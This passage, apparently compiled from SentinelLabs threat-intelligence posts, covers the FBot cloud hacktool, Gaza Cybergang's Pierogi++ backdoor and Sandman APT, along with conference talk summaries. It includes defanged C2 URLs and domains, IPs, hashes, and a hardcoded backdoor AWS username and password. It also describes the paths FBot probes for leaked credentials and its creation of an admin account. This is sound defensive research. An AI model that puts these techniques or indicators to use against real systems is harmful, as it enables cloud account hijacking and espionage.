verifyca[.]online VPS overlap (moderate confidence)
visiononline[.]store VPS overlap (moderate confidence)

URLs

Value Note
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE C2 URL (Office document)
http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6 C2 URL (Office document)
http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM C2 URL (HWP document)
http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP C2 URL (HWP document)

IP Addresses

Value Note
84.32.129[.]32 Cherry Servers VPS
84.32.131[.]104 Cherry Servers VPS
84.32.131[.]30 Cherry Servers VPS
84.32.131[.]50 Cherry Servers VPS
84.32.131[.]59 Cherry Servers VPS
84.32.131[.]66 Cherry Servers VPS
84.32.131[.]87 Cherry Servers VPS

Email Addresses

Value Note
c039911[@]daum.net Phishing email address
kirnchi122[@]hanmail.net Phishing email address

LABScon Replay | Send Lawyers, ‘Garchs, and Money

By: LABScon
18 January 2024 at 16:43

Allegations of oligarch elections meddling and influence is old news in 2024, but while prosecutors focus on the money trail in building threat intelligence based cases for indictment, don’t overlook oligarch-funded lawyers with creative delay and distract defense tactics.

From twisting data privacy laws to using funds for SLAPP (Strategic Lawsuits Against Public Participation) libel cases to leaking legal discovery, Elizabeth Wharton dissects a series of US and UK cases citing the Mueller report and the Steele (Orbis) Dossier as examples where oligarchs have thrown lawyers and money as curveballs to exert influence and thwart cybercrime prosecutions. Liz explores the chilling effects that strategic lawsuits can have on researchers when their findings are buried or discredited in lengthy and expensive legal process.

Liz also discusses ways to further leverage these cases as opportunities for closing policy gaps, extend anti-SLAPP legislation and improve open source intelligence data gathering.

Watch the full, fascinating talk below!

About the Presenter

Elizabeth (Liz) leverages almost two decades of legal, public policy, and business experience to advise researchers and to build and scale cybersecurity and threat intelligence focused companies. In addition to having led operations at two adversary research focused startups, her recent prior experience includes serving as the Senior Assistant City Attorney on Atlanta’s ransomware incident immediate response team. Liz was recognized as the 2022 “Cybersecurity or Privacy Woman Law Professional of the Year” by the United Cybersecurity Alliance.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Exploring FBot  | Python-Based Malware Targeting Cloud and Payment Services

11 January 2024 at 13:55

Executive Summary

  • FBot is a Python-based hacking tool distinct from other cloud malware families, targeting web servers, cloud services, and SaaS platforms like AWS, Office365, PayPal, Sendgrid, and Twilio.
  • FBot does not utilize the widely-used Androxgh0st code but shares similarities with the Legion cloud infostealer in functionality and design.
  • Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts.
  • FBot is characterized by a smaller footprint compared to similar tools, indicating possible private development and a more targeted distribution approach.

Overview

The cloud hacktool scene is highly intertwined, with many tools relying on one another’s code. This is particularly true for malware families like AlienFox, Greenbot, Legion, and Predator, which share code from a credential scraping module called Androxgh0st.

We identified a tool that is related but distinct from these families. FBot is a Python-based attack tool with features to target web servers and cloud services as well as Software-as-a-Service (SaaS) technologies, including:

  • Amazon Web Services (AWS)
  • Office365
  • PayPal
  • Sendgrid
  • Twilio

FBot is unique in that it does not apparently adapt the Androxgh0st code so common among similar hacktools, though the earliest reference to FBot is one year more recent than the first sighting of Androxgh0st. However, there are several connections to the Legion cloud infostealer, making it likely the Legion maintainer adapted code from FBot into their tool.

FBot is primarily designed for actors to hijack cloud, SaaS, and web services. There is a secondary focus on obtaining accounts to conduct spamming attacks. Actors can use the credential harvesting features to obtain initial access, which they can sell to other parties.

The tool contains assorted utilities, including an IP address generator and port scanner. There is also an email validator function, which uses an Indonesian technology service provider to validate email addresses.

FBot menu and list of features
FBot menu and list of features

AWS Targeting

FBot has three functions dedicated to AWS account attacks. The first is an AWS API Key Generator, handled by function aws_generator, which generates a random AWS access key ID by appending 16 randomly selected alphabetic characters to the standard AKIA prefix. Then, it generates a secret key from 40 randomly selected alphabetic characters.

Despite FBot’s apparent lack of adopting the Androxgh0st modules, the same feature was highlighted in research on the Legion stealer as well as an older Androxgh0st variant, and it has not changed significantly. We agree with the aforementioned researchers’ conclusion that this feature is unlikely to succeed at brute forcing account credentials due to the possible number of access key and password combinations.

The second AWS feature is a Mass AWS Checker, handled by function aws_checker. This function checks for AWS Simple Email Service (SES) email configuration details, including the maximum send quota and rate, as well as how many messages have been sent in the past 24 hours, likely to maximize spamming efforts against the targeted account. It also creates a new user account with the username iDevXploit and the password MCDonald2021D#1337 and attaches the AdminsitratorAccess policy to elevate privileges for the new account. Unlike other cloud attack tools such as AlienFox, FBot does not delete the compromised account that the attacker used to gain access.

The third and final AWS feature is an AWS EC2 Checker, with the description Get EC2 VCPU Limit, which is handled by function ec_checker. This function reads a list of AWS identities from a text file in the format of AccessKey|SecretKey|Region. The script uses these values to check the targeted account’s EC2 service quotas. The FBot menu highlights that this can be used to check vCPU details, although the output is less straightforward. The query results describe the account’s EC2 configurations and capabilities, such as what types of EC2 instances can run. The script iterates through a list of specified AWS regions, runs the query again for each region, and logs the result to a text file.

Example EC2 quota output captured by FBot’s ec_checker function
Example EC2 quota output captured by FBot’s ec_checker function

SaaS & Payment Services Targeting

FBot has several features that target payment services as well as SaaS configurations.

The PayPal Validator feature is handled by paypal_validator. This function validates PayPal account status by contacting a hardcoded URL with an email address read from an input list. The email is added to the request in the customer details section to validate whether an email address is associated with a PayPal account.

The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer’s retail sales website. Interestingly, all identified FBot samples use this website to authenticate the PayPal API requests, and several Legion Stealer samples do as well.

PayPal Validator crafts the request to this site with a fake item ID as well as phony customer details, then parses the response for a status message indicating success.

PayPal validation request data
PayPal validation request data

FBot also targets several SaaS platforms, including Sendgrid and Twilio. The Sendgrid feature is a Sendgrid API Key Generator, which generates a Sendgrid key formatted like:

SG.{22 characters from [A-Z0-9-_]}.{1 more character from previous range}

The Twilio feature takes the Twilio SID and Twilio Auth Token as input, separated by a pipe. The function then checks the SID & auth token combination for details about the account, including the balance and which currency, a list of phone numbers connected to the account.

Web Framework Features

FBot has features for validating if URLs host a Laravel environment file and for extracting credentials from those files. The Hidden Config Scanner feature takes a URL as input and crafts an HTTP GET request to several PHP, Laravel, and AWS-related URIs where configuration values may be stored, including:

_profiler/phpinfo config.js
.env config/aws.yml
.env.bak info.php
aws.yml phpinfo
aws/credentials phpinfo.php

The response is parsed for keys and secrets related to the following services and the result is written to a text file:

AWS MandrillApp
Coinpayments Office365
DB_USERNAME (generic database) Plivo
Ionos Sendgrid
MAIL_PASSWORD (generic SMTP) Twilio
Mailgun

FBot also targets several popular Content Management Systems (CMS). The function cms_scanner contains a map of CMS and web frameworks to regular expressions (regex) associated with the service. The program creates a request to the targeted URL and parses the response for the following technologies:

Codeigniter Laravel phpBB
Discuz Lithium PrestaShop
Drupal Magento vBulletin
Esportsify MediaWiki Whmcs
FluxBB Moodle WordPress
Invision Ning YetAnotherForum
Jive OpenCart ZenCart
Joomla osCommerce Zimbra

Taxonomy

FBot relies on configuration values to be fed to it through a configuration file (.ini), or through headers that initiate the main class. We identified one version that is compiled as a Windows executable.

The string iDevXploit is present across all samples: this handle is credited as the author in the main class. Additionally, the aws_checker function leaves artifacts in targeted AWS consoles: when FBot creates a new user in the AWS account, the username iDevXploit is consistent across samples, along with the password MCDonald2021D#1337.

Unlike many similar cloud hacktools, FBot does not contain references to the open-source Androxgh0st code found in tools like AlienFox, GreenBot, and Predator. The logic implemented is very similar in that both Androxgh0st and FBot parse environment configuration files for credentials related to similar mail & cloud services, but the implementation is different and no code seems to be directly borrowed.

There is considerable overlap with the Legion cloud infostealer in how the tools scrape URLs for PHP configuration. However, FBot is much smaller and less fully featured than Legion, with FBot samples weighing in at approximately 200 KB and Legion ranging from 800-1200 KB in size.

Conclusion

FBot demonstrates another tool family that continues the trend of adopting cloud attack tool code from one tool into another, while maintaining its own distinct flavor. We have seen samples spanning July 2022 to January 2024, showing there is continued proliferation of this tool. However, there are relatively few changes across versions and it is unclear whether this is actively maintained.

As of this writing, we are unable to identify a distribution channel dedicated to FBot, which differentiates the tool from other cloud infostealers often sold on Telegram. The bot has references to buffer_0x0verfl0w, a Telegram channel associated with various crimeware that has since been retired. However, we found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation. This aligns with the theme of cloud attack tools being bespoke ‘private bots’ tailored for the individual buyer, which is a theme prevalent among AlienFox builds.

Organizations should enable multi-factor authentication (MFA) for AWS services with programmatic access. Create alerts that notify security operations teams when a new AWS user account is added to the organization, as well as alerts for new identities added or major configuration changes to SaaS bulk mailing applications where possible.

Indicators of Compromise

SHA1 Notes
1ad78e99918fd66ed43d42a93d2f910a2173b3c5 Bot.py, January 2024 version of FBot
2becd32162b2b0cb1afc541e33ace3a29dad96f1 April 2023 version of FBot
8ba3fca4deada6dbdc94b17a0c3c55a0b785331e Bot.py, July 2022 version of FBot
iDevXploit Hardcoded AWS IAM Username
MCDonald2021D#1337 Hardcoded AWS IAM User password

LABScon Replay | Spectre Strikes Again: Introducing the Firmware Edition

By: LABScon
28 December 2023 at 16:00

The excitement surrounding speculative execution attacks may have subsided, but sadly, such threats remain. Binarly Research has discovered a vast attack surface still vulnerable to known issues like Spectre v1 and v2 on AMD silicon. Ineffective mitigations and the complexity of validation negatively impact the AMD device ecosystem.

While the industry is currently concentrating on constructing confidential computing infrastructure, foundational design problems reveal a lack of basic security at the hardware level. This discovery was made possible due to the asynchronous nature of firmware and hardware security fixes development.

Throughout their lifecycle, devices are susceptible to security issues due to the asynchronous nature of firmware security fixes delivery from multiple parties and the asynchronous nature of the supply chain. The lack of transparency in vendor security advisories results in an opaque channel for informing customers about the criticality of released security fixes and leads to varying approaches to patching widespread vulnerabilities with industry-wide implications.

Even major silicon vendors develop mitigations for side-channel attacks differently. This situation presents an opportunity for potential threat actors to exploit known speculative attacks like the 5-year-old Spectre or the 1-year-old Retbleed. A new perspective is needed to construct an attack vector that utilizes speculative attacks to target UEFI-specific firmware vulnerabilities.

In this presentation, we discuss our research into the potential use of speculative attacks against the System Management Mode (SMM) on AMD-based devices and outline the methodologies we employed throughout our research investigation.

About the Presenter

Alex Matrosov is CEO and Founder of Binarly Inc. where he builds an AI-powered platform to protect devices against emerging firmware threats. He is the author of numerous research papers and the book Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats. He is a frequently invited speaker at security conferences, such as REcon, Black Hat, Offensivecon, WOOT, DEF CON, and many others.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

LABSCon Replay | Intellexa and Cytrox: From Fixer-Upper to Intel Agency Grade Spyware

By: LABScon
26 December 2023 at 17:00

In this enlightening LABScon Replay session, Vitor Ventura, senior security researcher at Cisco Talos, alongside Michael Gentile, delves into the intriguing evolution of Intellexa and Cytrox in the spyware domain.

The Developmental Saga of Intellexa and Cytrox

Mercenary spyware companies need to evolve their spyware capabilities just like software from any other commercial company. This presentation details an account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Ventura and Gentile explore the journey of Intellexa, which emerged from the amalgamation of Nexa Technologies, WiSpear, and Cytrox, focusing on Android spyware. The talk sheds light on the critical developments that marked Intellexa’s ascension as a formidable entity in the spyware industry, adept in targeting both iOS and Android platforms.

A Deep Dive into Spyware Development

Ventura and Gentile comprehensively analyze ALIEN/PREDATOR, Intellexa’s flagship spyware suite. Through a combination of code analysis and Open Source Intelligence (OSINT), they chart the evolutionary path of this advanced spyware, revealing its sophisticated capabilities.

The presentation dissects the pivotal moments in the development cycle of the ALIEN/PREDATOR spyware suite, offering the audience valuable insights into spyware research methodologies.

Analyzing the Intricacies of Spyware Components

An important part of the talk is dedicated to the technical breakdown of the spyware’s components. The presenters discuss the distinctions and similarities between the ALIEN/PREDATOR suite and the standalone PREDATOR for iOS, providing a clear understanding of the platform-specific nuances.

This session is a recommended watch for those interested in the complexities of spyware development and its broader implications in cybersecurity. Ventura and Gentile impart a thorough understanding of the nuanced world of digital espionage and the dynamic cyber threat landscape.

Watch the Full Talk Below

About the Presenters

Vitor Ventura is a Cisco Talos security researcher and manager of the EMEA and Asia Outreach team. As a researcher, he investigated and published various articles on emerging threats. Vitor has been a speaker in conferences, like VirusBulletin, NorthSec, Defcon’s Crypto and Privacy Village, among others. Prior to that he was IBM X-Force IRIS European manager where he was the lead responder on several high profile organizations affected by the WannaCry and NotPetya infections.

Mike Gentile is a Senior Security Researcher at Cisco Talos.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Gaza Cybergang | Unified Front Targeting Hamas Opposition

14 December 2023 at 13:55

Executive Summary

  • Overlaps in targeting, malware characteristics, and long-term malware evolutions post 2018 suggest that the Gaza Cybergang sub-groups have likely been consolidating, possibly involving the establishment of internal and/or external malware supply lines.
  • Gaza Cybergang has upgraded its malware arsenal with a backdoor that we track as Pierogi++, first used in 2022 and seen throughout 2023.
  • Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war.
  • SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.

Overview

Active since at least 2012, Gaza Cybergang is a suspected Hamas-aligned cluster whose operations are primarily targeting Palestinian entities and Israel, focusing on intelligence collection and espionage. Being a threat actor of interest in the context of the Israel-Hamas war, we track Gaza Cybergang as a group composed of several adjacent sub-groups observed to share victims, TTPs, and use related malware strains since 2018. These include Gaza Cybergang Group 1 (Molerats),  Gaza Cybergang Group 2 (Arid Viper, Desert Falcons, APT-C-23), and Gaza Cybergang Group 3 (the group behind Operation Parliament).

The goal of this post is twofold:

  • To highlight relations between recent and historical operations, providing a new common context connecting the Gaza Cybergang sub-groups.
  • To provide recent findings and previously unreported IOCs, which add to the accumulated knowledge of the group and support further collective tracking of Gaza Cybergang activities.

In the midst of Gaza Cybergang activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal used in targeting primarily Palestinian entities. We track this backdoor as Pierogi++. We assess that Pierogi++ is based on an older malware strain named Pierogi, first observed in 2019. We also observed consistent targeting of Palestinian entities in this time period using the group’s staple Micropsia family malware and Pierogi++.

This targeting is typical for Gaza Cybergang. These activities are likely aligned with the tensions between the Hamas and Fatah factions, whose reconciliation attempts had been stagnating before and after the outbreak of the Israel–Hamas war. At the time of writing, our visibility into Gaza Cybergang’s activities after the onset of the conflict does not point to significant changes in their intensity or characteristics.

Our analysis of recent and historical malware used in Gaza Cybergang operations highlights new relations between activities that have taken place years apart – the Big Bang campaign (2018) and Operation Bearded Barbie (2022). Further, technical indicators we observed, originating from a recently reported activity, reinforce a suspected relation between Gaza Cybergang and the lesser-known threat group WIRTE. This group has historically been considered a distinct cluster and then associated with low confidence with the Gaza Cybergang. This demonstrates the intertwined nature of the Gaza Cybergang cluster making the accurate delineation between its constituent and even other suspected Middle Eastern groups challenging.

Throughout our analysis of Gaza Cybergang activities spanning from 2018 until present date we observed consistent malware evolution over relatively long time periods. This ranges from minor changes in used obfuscation techniques, to adopting new development paradigms, and resurfacing old malware strains in the form of new ones (as Pierogi++ demonstrates). In addition, the observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process. This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors.

Micropsia and Pierogi++ Target Hamas Opposition

The Gaza Cybergang umbrella has continuously targeted Israeli and Palestinian entities preceding the Israel-Hamas war. We observed additional activities spanning from late 2021 to late 2023 aligned with previous research. Our visibility into these activities, and the theme and language of the used lure and decoy documents, indicate that they were primarily targeting Palestinian entities. The majority involved malware variants of the staple Micropsia family.

Among the Micropsia family malware, we observed its Delphi and Python-based variants deploying decoy documents written in Arabic and focussing on Palestinian matters, such as the Palestinian cultural heritage and political events. Many of the associated C2 domain names, such as bruce-ess[.]com and wayne-lashley[.]com, reference public figures, which aligns with the known domain naming conventions of the group. To support further collective tracking of Gaza Cybergang activities, we focus at the end of the report on listing previously unreported Micropsia indicators.

Decoy document
Decoy document

Among the Micropsia activities we identified a backdoor that we assess is based on a malware first reported in 2020 and named Pierogi. This backdoor, which we labeled Pierogi++, is implemented in C++, and we observed its use in 2022 and over 2023. The malware is typically delivered through archive files or weaponized Office documents on Palestinian matters, written in English or Arabic.


Malicious documents distributing Pierogi++
Malicious documents distributing Pierogi++

The documents distributing Pierogi++ use macros to deploy the malware, which then typically masquerades as a Windows artifact, such as a scheduled task or a utility application. The malware implementation is embedded either in the macros or in the documents themselves, often in Base64-encoded form.

Office macro deploying Pierogi++
Office macro deploying Pierogi++

Pierogi++ executables also masquerade as politically-themed documents, with names such as “The national role of the revolutionary and national councils in confronting the plans for liquidation and Judaization”“The situation of Palestinian refugees in Syria refugees in Syria”, and “The Ministry of State for Wall and Settlement Affairs established by the Palestinian government”.

We assess that Pierogi++ is based on the Pierogi backdoor, whose variants are implemented in Delphi and Pascal. Pierogi and Pierogi++ share similarities in code and functionalities, such as strings, reconnaissance techniques, and deployment of decoy documents, some also seen in Micropsia malware.

String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)
String indicating that no anti-virus solution has been detected: Pierogi++ (Tm9BVg== decodes to NoAV)

String indicating that no anti-virus solution has been detected: Micropsia
Micropsia

Further, Pierogi++ samples implement in the same order the same backdoor functionalities as Pierogi: taking screenshots, command execution, and downloading attacker-provided files.

When handling backdoor commands, some Pierogi++ samples use the strings download and screen, whereas earlier Pierogi samples have used the Ukrainian strings vydalytyZavantazhyty, and Ekspertyza. This raised suspicions at the time of potential external involvement in Pierogi’s development. We have not observed indicators pointing to such involvement in the Pierogi++ samples we analyzed.

Pierogi++ backdoor strings
Pierogi++ backdoor strings

Most of the Pierogi++ C2 servers are registered at Namecheap and hosted by Stark Industries Solutions LTD, aligning with previous infrastructure management practices of the Gaza Cybergang umbrella. The backdoor uses the curl library for exchanging data with the C2 server, a technique that we do not often observe in Gaza Cybergang’s malware arsenal.

Use of the curl library
Use of the curl library

Pierogi++ represents a compelling illustration of the continuous investment in maintenance and innovation of Gaza Cybergang’s malware, likely in an attempt to enhance its capabilities and evade detection based on known malware characteristics.

From Molerats to Arid Viper And Beyond

Following the first report on the Pierogi backdoor in February 2020, late 2020 and 2021 mark the association of the backdoor and its infrastructure with Arid Viper. The Micropsia activity linked to Arid Viper, which led to the discovery of the then-new PyMicropsia malware in December 2020, includes Pierogi samples. Further historical Pierogi samples use the escanor[.]live and nicoledotso[.]icu domains for C2 purposes, which have been associated with Arid Viper in December 2020 and April 2021. The latest variant of Pierogi is Pierogi++, which we observed targeting Palestinian entities in 2022 and over 2023 – this targeting is typical for Arid Viper.

Our investigations into malware used by Gaza Cybergang prior to 2022, which share capabilities, structure, and infrastructure with Pierogi, resulted in a multitude of samples implemented in Delphi, Pascal, and C++. This highlights the frequent adoption of different development paradigms by Gaza Cybergang and aligns with the observations by Facebook, which associates these variants with Arid Viper and tracks them using different names under the broader Micropsia malware family, such as Glasswire, Primewire, and fgref.

Malware attributions
Malware attributions

In late 2020, victims targeted with Pierogi variants as part of a suspected Arid Viper operation were observed to be also infected with the then-new SharpStage and DropBook malware, an overlap assessed to strengthen the ties between the Molerats and Arid Viper Gaza Cybergang sub-groups.

Later in June 2021, the LastConn malware, which has been discovered as part of activities attributed to the TA402 cluster, was assessed with high confidence to be an updated version of SharpStage.

Based on our followup investigation into recent 2023 TA402 activity targeting Middle Eastern government entities, we highlight concrete overlaps in malware used by TA402 and a lesser-known threat actor named WIRTE. First disclosed in April 2019, WIRTE was initially considered to be a distinct cluster but later associated with low confidence to the Gaza Cybergang umbrella (primarily based on the use of decoys on Palestinian matters, which are typical for the Gaza Cybergang constituent sub-groups).

WIRTE is known for using a unique custom user agent for C2 communication when staging malware, with the value of the rv field likely being an intrusion identifier. WIRTE’s stagers encapsulate C2 communication attempts in an infinite loop, separated by sleep periods of randomly generated lengths within defined lower and upper boundaries. We observe the same unique user agent format and C2 communication pattern in TA402’s .NET malware stagers.

User agent and C2 communication in 2020 WIRTE
User agent and C2 communication in 2020 WIRTE malware

User agent and C2 communication in 2022 TA401 malware
User agent and C2 communication in 2022 TA401 malware

The involvement of malware artifacts previously seen only in the context of WIRTE indicates a likely relation between the TA402, WIRTE, and Gaza Cybergang clusters. This aligns with the latest TA402 attribution assessment as a cluster overlapping with Gaza Cybergang and WIRTE.

Back To The Big Bang

Operation Bearded Barbie, revealed in April 2022 and attributed with moderate-high confidence to Arid Viper, is a campaign that has been targeting Israeli individuals and officials in the law enforcement, military, and emergency services sectors. The operation highlights the BarbWire backdoor as a novel malware in Arid Viper’s arsenal.

A closer look at the implementation of the BarbWire variants observed as part of Operation Bearded Barbie reveal relations to a malware strain used as part of the 2018 Big Bang campaign, which was considered an evolution of a 2017 campaign targeting Palestinian individuals and entities. Without making a concrete attribution at the time, the campaign was loosely associated with the Gaza Cybergang, noting some links to Arid Viper in particular.

The Big Bang campaign involves the use of a C++ implant, assessed to be an upgraded version of older Micropsia variants. In addition to some similarities in execution flow and structure, we observed that the backdoors used in the Big Bang and Bearded Barbie campaigns share unique strings that report the execution status and/or indicate internal references to malware modules.

The BarbWire samples used as part of Operation Bearded Barbie are reported to implement a custom base64 algorithm (cit.) to obfuscate strings. The backdoor does not implement changes to the Base64 encoding algorithm itself, but modifies Base64 strings by adding an extra character that is removed before decoding. String decoding of BarbWire strings in this way reveals exact matches between BarbWire and the backdoor observed in the Big Bang campaign.

Backdoor string matches
Backdoor string matches

In contrast to BarbWire, BigBang backdoor samples obfuscate the same strings present in BarbWire using Base64-encoding only. The malware authors have likely introduced the Base64 string modification technique in later malware development efforts (reflected in Operation Bearded Barbie), as a relatively simple but effective attempt to evade detection based on known string artifacts.

This technique also allows for quick changes of the modified Base64 strings by only changing the second character to keep evading detection over time. For example, both of the strings IZERvZXMgbm90IGV4aXN0Lg and IHERvZXMgbm90IGV4aXN0Lg Base64-decode to “ Does not exist.” once the second character is removed.

Conclusions

Gaza Cybergang operations over 2022 and 2023 reveal a sustained focus on targeting Palestinian entities. The discovery of the Pierogi++ backdoor shows that the group continues to evolve and supplement its staple malware arsenal, including transforming older implementations into new tooling.

The intertwined nature of its constituent sub-groups sharing TTPs, malware, and victims, indicates that Gaza Cybergang is a unified front against anti-Hamas interests. The persistent nature of the Gaza Cybergang threat underscores the necessity for sustained vigilance and cooperative measures to address the challenges posed by these threat actors.

SentinelLabs continues to monitor Gaza Cybergang activities to further improve the collective knowledge on the group’s dynamics and to supply indicators, which are relevant to security teams defending their organizations and individuals at risk of being targeted.

Indicators of Compromise

SHA-1 Hashes

003bb055758a7d687f12b65fc802bac07368335e Micropsia family malware
19026b6eb5c1c272d33bda3eab8197bec692abab Micropsia family malware
20c10d0eff2ef68b637e22472f14d87a40c3c0bd Pierogi backdoor
26fe41799f66f51247095115f9f1ff5dcc56baf8 TA402 malware staging executable (2022 version)
278565e899cb48138cc0bbc482beee39e4247a5d Pierogi backdoor
2a45843cab0241cce3541781e4e19428dcf9d949 Micropsia family malware
32d0073b8297cc8350969fd4b844d80620e2273a Document distributing Pierogi++
3ae41f7a84ca750a774f777766ccf4fd38f7725a Document distributing Pierogi++
42cb16fc35cfc30995e5c6a63e32e2f9522c2a77 Pierogi++
4dcdb7095da34b3cef73ad721d27002c5f65f47b BarbWire backdoor
5128d0af7d700241f227dd3f546b4af0ee420bbc Pierogi++
5619e476392c195ba318a5ff20e40212528729ba Micropsia family malware
599cf23db2f4d3aa3e19d28c40b3605772582cae Pierogi backdoor
5e46151df994b7b71f58556c84eeb90de0776609 Document distributing Pierogi++
5fcc262197fe8e0f129acab79fd28d32b30021d7 WIRTE PowerShell script
60480323f0e6efa3ec08282650106820b1f35d2f Archive distributing Pierogi++
694fa6436302d55c544cfb4bc9f853d3b29888ef BarbWire backdoor
708f05d39df7e47aefc4b15cb2db9f26bc9fad5f TA402 malware staging executable (2022 version)
745657b4902a451c72b4aab6cf00d05895bbc02f Micropsia family malware
75a63321938463b8416d500b34a73ce543a9d54d Pierogi++
95fc3fb692874f7415203a819543b1e0dd495a57 Micropsia family malware
994ebbe444183e0d67b13f91d75b0f9bcfb011db Operation Big Bang backdoor
aeeeee47becaa646789c5ee6df2a6e18f1d25228 Pierogi++
c3038d7b01813b365fd9c5fd98cd67053ed22371 Micropsia family malware
da96a8c04edf8c39d9f9a98381d0d549d1a887e8 Pierogi++
ee899ae5de50fdee657e04ccd65d76da7ede7c6f Operation Big Bang backdoor
f3e99ec389e6108e8fda6896fa28a4d7237995be Pierogi++

Domains

aracaravan[.]com Pierogi++ C2 server
beatricewarner[.]com Pierogi++ C2 server
bruce-ess[.]com Micropsia C2 server
claire-conway[.]com Micropsia C2 server
delooyp[.]com Micropsia C2 server
escanor[.]live Pierogi backdoor C2 server
izocraft[.]com Micropsia C2 server
jane-chapman[.]com Micropsia C2 server
lindamullins[.]info Operation Big Bang backdoor C2 server
nicoledotson[.]icu Pierogi backdoor C2 server
overingtonray[.]info Pierogi backdoor C2 server
porthopeminorhockey[.]net Micropsia C2 server
spgbotup[.]club Operation Big Bang backdoor C2 server
stgeorgebankers[.]com WIRTE C2 server
swsan-lina-soso[.]info Pierogi++ C2 server
theconomics[.]net TA402 C2 server
wanda-bell[.]website BarbWire C2 server
wayne-lashley[.]com Micropsia C2 server
zakaria-chotzen[.]info Pierogi++ C2 server

Sandman APT | China-Based Adversaries Embrace Lua

11 December 2023 at 13:55

By Aleksandar Milenkoski, Bendik Hagen (PwC), and Microsoft Threat Intelligence

Executive Summary

  • The Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at Labscon 2023 – STORM-0866/Red Dev 40.
  • The Sandman’s Lua-based malware LuaDream and the KEYPLUG backdoor were observed co-existing in the same victim environments.
  • Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions.
  • The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators.
  • The use of the Lua development paradigm in the cyberespionage domain, historically associated with actors considered Western or Western-aligned, is likely being adopted by a broader range of adversaries, including those with ties to China.

Overview

In this report, SentinelLabs, Microsoft, and PwC threat intelligence researchers provide attribution-relevant information on the Sandman APT cluster positioning this threat on the broader threat landscape. We highlight links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. This includes victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.

STORM-0866/Red Dev 40 is a developing APT threat cluster primarily targeting entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities. These are regions and sectors where we also observed Sandman activity. The modular backdoor KEYPLUG is a staple in STORM-0866/Red Dev 40’s arsenal. Mandiant first reported on KEYPLUG as part of intrusions into U.S. government entities by the Chinese APT group APT41.

Microsoft and PwC have subsequently identified at least three other developing clusters involving KEYPLUG, including STORM-0866/Red Dev 40. Their research, making the case that KEYPLUG is likely shared among multiple suspected China-based groups, was presented at LabsCon 2023. They distinguish STORM-0866/Red Dev 40 from the other clusters based on specific malware characteristics, such as unique encryption keys for KEYPLUG C2 communication, and a higher sense of operational security, such as relying on Cloud-based reverse proxy infrastructure for hiding the true hosting locations of their C2 servers.

SentinelLabs and Microsoft have observed Sandman’s LuaDream and KEYPLUG implants cohabiting in the same victim environments, some of which are on the same endpoints. LuaDream is a maintained modular backdoor based on LuaJIT, with version 11.0.2.1.23.1 observed in March 2023 and version 12.0.2.5.23.29 observed in August 2023. In one instance, the KEYPLUG malware had been deployed approximately 3 months prior to LuaDream (in May 2023). LuaDream and KEYPLUG were active at the same time over approximately 2 weeks until both threats were remediated. During this time period, we did not observe any contestation or deconfliction activities by the LuaDream or KEYPLUG operators.

A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators.

The findings we present are yet another showcase of the complex nature of the China-based threat landscape. As exemplified by Sandman and STORM-0866/Red Dev 40, this landscape is marked by substantial cooperation and coordination among its constituent threat groups, along with the possibility of third-party vendors supplying the operational teams with tooling. This makes accurate clustering challenging. Therefore, while acknowledging the association of Sandman with the suspected China-based adversaries using KEYPLUG, we continue to track Sandman as a distinct cluster until further conclusive information suggesting otherwise becomes available.

Lua-based modular backdoors, such as LuaDream, have been observed relatively rarely and often in the context of espionage-motivated APTs historically considered Western or Western-aligned. Our findings on Sandman indicate that the Lua development paradigm is being adopted by a broader set of cyberespionage threat actors for the modularity, portability, and simplicity that the Lua scripting language offers.

Sandman and STORM-0866/Red Dev 40 Infrastructure

